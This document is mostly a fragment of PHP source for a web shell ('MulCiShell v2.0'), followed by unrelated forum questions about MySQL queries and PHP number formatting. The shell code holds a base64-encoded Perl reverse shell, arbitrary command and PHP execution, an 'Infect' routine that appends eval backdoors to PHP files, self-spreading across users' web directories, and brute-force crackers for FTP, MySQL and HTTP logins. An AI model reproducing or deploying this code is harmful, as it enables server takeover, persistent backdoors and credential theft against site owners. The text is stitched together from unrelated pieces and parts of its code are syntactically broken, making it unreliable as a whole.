Qp9"; $backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0K"; $pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIGhvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcsDQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk="; $access_control=0; $md5_user="123"; $md5_pass="123"; $user_agent="MulCiber"; $allowed_addrs=array('127.0.0.1'); $shell_email="NeverAgain@hotmail.com"; $self=basename($_SERVER['PHP_SELF']); $addr=$_SERVER['REMOTE_ADDR']; $serv=@gethostbyname($_SERVER['HTTP_HOST']); $soft=$_SERVER['SERVER_SOFTWARE']; $safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON"; $open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON"; $uname=@php_uname(); $space=TrueSize(disk_free_space(realpath(getcwd()))); $total=TrueSize(disk_total_space(realpath(getcwd()))); $id=@execmd("id",$disable); $int_paths=array("mybb","phpbb","phpbb3","forum","forums","board","boards","bb","discuss"); $inc_paths=array("includes","include","inc"); $sql_build_path; echo "<script type=\"text/javascript\" language=\"javascript\"> function togglecheck() { var cb=document.forms[0].check for (i in cb) { cb[i].checked=(cb[i].checked)?false:true; } } </script>"; switch($access_control) #Break statements intentionally ommited { case 3: $ip_allwd=false; foreach($allowed_addrs as $addr) { if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;} if(!$ip_allwd) exit; } case 2: if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass) { header("WWW-Authenticate: Basic Realm=\"Restricted area\""); header("HTTP/1.1 401 Unauthorized"); echo "Wrong username/password"; exit; } case 1: if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit; } if($id) { $s=strpos($id,"(",0)+1; $e=strpos($id,")",$s); $idval=substr($id,$s,$e-$s); } $disable=@ini_get("disable_functions"); if(empty($disable)) $disable="None"; function rm_rep($dir,&$success,&$fail) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$rm=readdir($dh))) { if($rm=='.' || $rm=='..') continue; if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...</br>"; rm_rep($dir.'/'.$rm,$success,$fail); continue;} if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...</br>";} else {$fail++; echo "Failed to delete $rm</br>";} } @closedir($dh); } else echo "Failed to open dir $dir</br>"; } function chmod_rep($dir,&$success,&$fail,$mod_value) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$ch=readdir($dh))) { if($ch=='.' || $ch=='..') continue; if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...</br>"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;} if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...</br>";} else {$fail++; echo "Failed to chmod $rm</br>";} } @closedir($dh); } else echo "Failed to open dir $dir</br>"; } #Complete these functions function spread_self($user,&$c=0,$d=0) { if(!$d) $dir="/home/$user/public_html/"; else $dir=$d; if(is_dir($dir)&&is_writable($dir)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/SSS.php'); echo "[+] Shell copied to $dir.$f./SSS.php</br>"; $c++; } if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir</br>"; while((@$f=readdir($dh))) { if($f!="."&&$f!="..") { if(@is_dir($dir.$f)) { echo "[+] Spreading to dir $dir</br>"; if(@is_writable($dir.$f)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/SSS.php'); echo "[+] Shell copied to $dir.$f./SSS.php</br>"; $c++; } $c+=spread_self($user,$c,$dir.$f.'/'); } } } } function copy_rep($dir,&$c) { } function backup_site() { if(!isset($_POST['busite'])) { echo "<center>The following tool will attempt to retrieve every file from the specified dir (including child dirs).</br>If successful, you will be prompted for a site backup download.</br><i>Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.</i></center>"; } } function infect_rep($dir,&$success,&$fail) { } function copy_dir($dir,$new_dir) { } ################################## function execmd($cmd,$d_functions="None") { if($d_functions=="None") {$ret=passthru($cmd); return $ret;} $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd); return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; } } } return -1; } $links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode", "Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf", "Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill"); echo "<html><head><title>MulCiShell v2.0 -- VLinhT</title></head>"; switch($_SESSION['theme']) { case 'green': echo "<style> body{color:#66FF00; font-size: 12px; font-family: serif; background-color: black;} td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;} td:hover{background-color: black; color: #33FF00;} input{background-color: black; color: #00FF00; border: 1px solid green;} input:hover{background-color: #006600;} textarea{background-color: black; color: #00FF00; border: 1px solid white;} a {text-decoration: none; color: #66FF00; font-weight: bold;} a:hover {color: #00FF00;} select{background-color: black; color: #00FF00;} #main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;} #main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-family: arial; text-decoration: none; } #main a:hover{color: #00FF00; text-decoration: underline;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;} </style> <body>"; break; case 'dark': echo "<style> body{color: #FFFFFF; font-size: 12px; font-family: serif; background-color: #000000;} td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2px; font-size: 12px; color: #FFFFFF;} input{background-color: black; color: #FFFFFF;; border: 1px solid #FFFFFF;} input:hover{background-color: #000099;} textarea{background-color: #000000; color: #FFFFFF; border: 1px solid white;} a {text-decoration: none; color: #FFFFFF; font-weight: bold;} a:hover {font-weight: bold;} select{background-color: #000000; color: #FFFFFF;} #main{border-bottom: 1px solid white; padding: 5px; text-align: center;} #main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; font-family: arial; text-decoration: none; } #main a:hover{font-weight: bold;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;} </style><body>"; break; default: echo "<style> body{color: white; font-size: 12px; font-family: arial; scrollbar-base-color:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; } td {border: 1px solid #000099; background-color: #000033; padding: 2px; font-size: 12px; color: white; } input{background-color: black; color: white; border: 1px solid #000066;} input:hover{background-color: #000066; border: 1px solid white;} td:hover {color: yellow; background: black;} textarea{background-color: #000033; color: white; border: 1px solid white;} a {text-decoration: none; color: white; font-weight: bold;} a:hover {color: yellow} select{background-color: black; color: white;} #main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: center;} #main a{padding-right: 15px; color: white; font-size: 12px; font-family: arial; text-decoration: none; } #main a:hover{color: #0033FF; text-decoration: underline;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;} </style> <body bgcolor='black'>"; break; } echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "<table style='width: inherit; margin: auto; text-align: center;'> <tr><td>Server IP</td><td>Your IP</td><td>Disk space</td><td>Safe_mode?</td><td>Open_BaseDir?</td><td>System</td><td>Server software</td><td>Disabled functions</td><td>ID</td><td>Shell location</td></tr> <tr><td>$serv</td><td>$addr</td><td>$space of $total</td><td>$safe_mode</td><td>$open_basedir</td><td>$uname</td><td>$soft</td><td>$disable</td><td>$idval</td><td>".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."</td></tr> </table></br> <div id='main'>"; foreach($links as $val=>$addr) echo "<a href='$addr'>[ $val ]</a>"; echo "</div><br>"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "<form action='$self?' method='post'><center><textarea rows='19' cols='75' readonly>MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_decode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2Hex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."</textarea><br><br>Input: <input type='text' style='width: 300px' name='encrypt'> <br><input type='submit' value='Encrypt' name='encryption'></center>"; } if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable); if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully<br>"; else echo "Failed to upload file!"; } } if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect': #Nothing special here, just kick them while they're down foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,"<?php @eval(\$_GET['e']) ?>"); @fclose($fh); } else $fail++; } echo "Successfully infected $success files; failed to infect $fail files</br>Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted<br>"; $success++; } else { echo "Failed to delete file $file<br>"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files<br>"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file<br>"; $success++; } else { echo "Failed to change mode for $file<br>"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files<br>"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...</br>"; if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false; if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass<br>"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...</br>"; $show=0;} } } else echo "Failed to connect!</br>"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i<count($path);$i++) $full_path.='/'.$path[$i]; } elseif(isset($_POST['vbcrack'])) { if(empty($_POST['vbhash']) OR empty($_POST['vbsalt'])) die("Please specify a hash and salt"); while(!feof($list)) { $show++; $pass=trim(fgets($list)); $vbenc=md5(md5($pass).$_POST['vbsalt']); if($vbenc===$_POST['vbhash']) { echo "Password for $_POST[vbhash] found! is $pass</br>"; break; } if($show===10000) { $show=0; echo "Trying pass $pass...</br>"; } } echo "Complete</br>"; } elseif(isset($_POST['mysqlcrack'])) { $host=$_POST['mysql_host']; $user=$_POST['mysql_user']; if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]"; while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(@mysql_connect($host,$user,$pass)) { echo "Password found! Password for $user is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } elseif(isset($_POST['authcrack'])) { $arr=explode('/',$_POST['auth_url']); $con_url=$arr[0]; if(empty($_POST['auth_url'])) die("Enter a target first..."); for($i=1;$i<count($arr);$i++) $path.='/'.$arr[$i]; if(preg_match("/^http:\/\/+/",$_POST['auth_url'])) die("Do not include http:// in the url"); while(!feof($list)) { if(is_resource($conn_url=fsockopen($con_url,80,$errno,$errstr,5))) { $show++; $pass=trim(fgets($list)); if($show>5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'.$pass); $header="GET $path HTTP/1.1\r\n"; $header.="Host: $con_url\r\n"; $header.="Authorization: Basic $encode\r\n"; $header.="Connection: Close\r\n\r\n"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp)) { echo "Password found! Password=$pass</br></br>"; break 2; } } } } echo "Done</br>"; } elseif(isset($_POST['md5crack'])) { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one "); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one "); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type']) { case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open</br>"; $sport++; } break; default: echo "Invalid request</br>"; } } if(isset($_POST['find_forums'])) { echo "<center><b>[ Forum locator ]</b></center></br></br>"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path</br>"; $found++; continue; } } } } echo "Scan complete. Found $found forums</br></br>"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php</br>"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "<center><b>[ Config locator ]</b></center></br></br>"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs</br></br>"; } if(isset($_POST['execmd'])) {echo "<center><textarea rows='10' cols='100'>"; echo execmd($_POST['cmd'],$disable); echo "</textarea></center>";} if(isset($_POST['execphp'])) {echo "<center><textarea rows='10' cols='100'>"; echo eval(stripslashes($_POST['phpcode'])); echo "</textarea></center>";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created<br>"; else echo "Failed to create file<br>"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created<br>"; else echo "Failed to create directory<br>"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo "<center><form action='$self?act=backc' method='post'> Address: <input type='text' value='$_SERVER[REMOTE_ADDR]' name='backconnip'> Port: <input type='text' value='1337' name='backconnport'> <input type='submit' value='Connect'></br></br> Listen with netcat by executing 'nc -l -n -v -p 1337'</br></br> <b>Note: Be sure to foward your port first</b> </form></center>"; } else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...</br>"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FF0000'>Warning: Failed to delete reverse-connection program</font></br>"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...</br>"; if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.<br>"; break; case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo "<center><form action='?act=spread' method='post'> This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br> Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br> <input type='submit' value='Spread' name='spread_shell'> </form></center>"; } else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times</br>":"Failed to spread the shell.</br>"; } break; case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n"; $header.="Host: searchy.protecus.de\r\n"; $header.="Connection: Close\r\n\r\n"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break; case 'kill': if(!isset($_POST['justkill'])) { echo "<center>Do you *really* want to kill the shell?<br><br><form action='$self?act=kill' method='post'> <input type='submit' value='Yes' name='justkill'></center>"; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.<br>"; else echo "Failed to delete shell<br>"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON"; $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "<center>Security overview</center><table style='margin: auto;'><tr><td>PHP Version</td><td>Safe mode</td><td>Open_Basedir</td><td>Magic_Quotes</td><td>Register globals</td><td> Remote includes</td><td>Read /etc/passwd?</td><td>MySQL</td><td>cURL</td></tr> <tr><td>$ver</td><td>$safe_mode</td><td>$open_basedir</td><td>$magic_quotes_on</td><td>$register_globals_on</td><td>$include_on</td> <td>$etc_passwd</td><td>$mysql_on</td><td>$curl_on</td> </tr>"; "</table>"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: <a href='$URL'>$URL</a>"; } else echo "Enumeration failed<br>"; break; } echo "<br>"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected<br>"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");} else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");} $current=explode("/",$d); echo "<table style='width: 100%; text-align: center;'><tr><td>Current location: ";for($p=0;$p<count($current);$p++) for($p=0;$p<count($current);$p++) { $cPath.=$current[$p].'/'; echo "<a href=$self?d=$cPath>$current[$p]</a>/"; } echo "</td></tr></table>"; if(isset($_GET['d'])) echo "<form action='$self?d=$_GET[d]' method='post'>"; else echo "<form action='$self?' method='post'>"; echo "<table style='width: 100%'> <tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Writable</td><td>Modified</td><td>Action</td></tr>"; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,,2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo "<tr><td><a href='$self?act=files&d=$f'>..</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td>None</td></tr>"; continue; } echo "<tr><td><a href='$self?act=files&d=$d/$f'>$f</a> </td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>"; } foreach($files as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); @$ch=substr(base_convert(fileperms($d.'/'.$f),10,,3); @$write=is_writable($d.'/'.$f)?"Yes":"No"; @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo "<tr><td><a href='$self?act=f&file=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>"; } echo "</table> <input type='button' style='background-color: none; border: 1px solid white;' value='Toggle' onClick='togglecheck()'></br> With checked file(s): <select name='fileaction'> <option name='chmod'>Chmod</option> <option name='delete'>Delete</option> <option name='infect'>Infect</option><input type='text' value='chmod value' name='cmodv'> </select> <br><input type='submit' value='Go' name='massfiles'></form>";

$userinfo = mysql_fetch_array(mysql_query("select $tab[pimp].*,users.signature from $tab[pimp] join users on $tab[pimp].code = users.code WHERE $tab[pimp].id=$threadinfo[user_id];")); $puser = "$userinfo[pimp]"; //this works $posts = "$userinfo[posts]"; //this works $avatar = "$userinfo[avatar]"; // this works $signature = "$userinfo[signature]"; // this doesnt So how can i get this from it? In the database it is a TEXT variable if that makes a difference.. this is the first time ive used a JOIN

never mind i fixed it using this article guess it is a bug in php on the centOS http://jetlogs.org/2008/02/05/php-problems-with-big-integers-and-scientific-notation/

i guess but it is as simple as it says <?$pmp = @mysql_fetch_array(mysql_query("SELECT crack FROM users12 WHERE id='1';")); $cts2=$pmp[0];?> <input type="text" class="text" size="8" name="crack2" value="<?=$cts2?>">

for instance for 2021200000 it will show like 2.0212E+9 It does this for all large numbers that have 0's at the end and i dont want it to do that is there a php built in function that will keep the original formatting?

na i mean it goes through 70,000 rows just to get that one row it isnt a huge issue, but if somehow this became 7,000,000 rows it would possibly be and i didnt know if there was a more optimized way = /

this method seems to look at all of the rows? id select_type table type possible_keys key key_len ref rows Extra 1 SIMPLE users ALL NULL NULL NULL NULL 70064 Using temporary; Using filesort

random selection of one row is what i want right now no filtering needed, but in the future i want to be able to randomly select from a user that has been offline for 24 hours givin a time contraint what would be the best way to do this? ive never done a random selection in a query so i want to be guided to the best way from the start

looks like it is still optimized using that one key

alright thanks! looks like my quotes were messing it up it seemed and your example method worked perfectly! do you happen to know the limits of this? like can the array be of inifinite size? also if userid is indexed will it run optimized still? since these are primary keys that cant exist more than once and only examine those rows instead of the whole table? guess i could say examine haha

hmmm is there a certain version of mysql to allow you to do this? currently this just shows no information doesnt error or anything from what i can see before it does the join thing in the query i have it print the array and it shows Array ( [0] => 772474564 [1] => 1414350111 [2] => 20707488 ) all of which are in the database so it should be finding these i believe instead of nothing

lets say i have an array of something like $users[]=123; $users[]=126; $users[]=323; this array can be an infinite amount of size in theory but 99% will be under 50 in size i want to do something like... $query=mysql_query("SELECT rank,score FROM users WHERE userid='$users[]' order by rank ASC"); now this isnt the correct syntax to use, but the hard part im getting at is that i need this information sorted other wise i could just do multiple queries in a for statement going through the array is it possible to do anything like what i want?

so it isnt possible to do this using a div?

I never said it was my host i am making applications for social web sites and they dont support it so i need to use a div if possible